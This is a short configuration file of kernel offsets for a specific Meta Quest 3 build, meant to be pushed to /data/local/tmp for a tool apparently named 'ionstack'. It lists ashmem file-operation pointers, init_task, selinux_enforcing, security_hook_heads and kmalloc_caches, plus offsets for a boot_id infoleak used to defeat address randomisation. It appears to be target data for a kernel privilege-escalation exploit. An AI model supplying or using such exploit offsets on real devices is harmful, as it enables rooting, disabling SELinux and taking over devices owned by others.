# Quest 3 - 52168470052900520
# Push to /data/local/tmp/ionstack.conf

kimage_text_base            = 0xffffffc008000000

# file_operations / function pointers
random_misc_fops_off        = 0x1e914b8
null_misc_fops_off          = 0xffffffec9f491368  # misc_fops
null_fops_off               = 0xffffffec9f490c68  # null_fops
ashmem_misc_fops_off        = 0x02819678
ashmem_fops_off             = 0x01ec7f20
ashmem_ioctl_off            = 0x00defbec
ashmem_compat_ioctl_off     = 0x00df004c
ashmem_mmap_off             = 0x00df00ac
ashmem_open_off             = 0x00df02f4
ashmem_release_off          = 0x00df0394
ashmem_show_fdinfo_off      = 0x00df0428
ashmem_read_iter_off        = 0x00df01d0
configfs_read_file_off      = 0x2dc3ec
configfs_write_bin_file_off = 0x2dc8a8
copy_splice_read_off        = 0x00547638
noop_llseek_off             = 0x004eaf60

# kernel variables
init_task_off               = 0x027ec200
init_uts_ns_off             = 0x026eea80
empty_zero_page_off         = 0x02dac000
root_task_group_off         = 0x028f0700
selinux_blob_sizes_off      = 0x01f044f0
selinux_enforcing_off       = 0x026b3c9c
security_hook_heads_off     = 0x01f02110
kmalloc_caches_off          = 0x01f04f30
anon_pipe_buf_ops_off       = 0x01db0468

# slide (boot_id infoleak) variables
slide_random_boot_id_data_off = 0x02a4f1d9
slide_sysctl_bootid_off       = 0x02a4f1d9
slide_loggers_0_1_off         = 0x026eed78
slide_nfulnl_logger_off       = 0x026eee50
